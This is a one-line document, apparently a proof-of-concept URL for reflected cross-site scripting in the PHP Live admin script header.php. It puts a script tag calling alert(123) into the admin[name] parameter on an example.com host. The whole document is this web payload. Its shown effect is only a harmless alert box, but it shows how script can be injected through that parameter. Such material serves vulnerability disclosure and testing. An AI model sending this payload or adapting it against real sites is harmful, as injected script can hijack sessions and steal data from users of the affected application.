http://www.example.com/phplive/admin/header.php?admin[name]=<script>alert(123);</script>
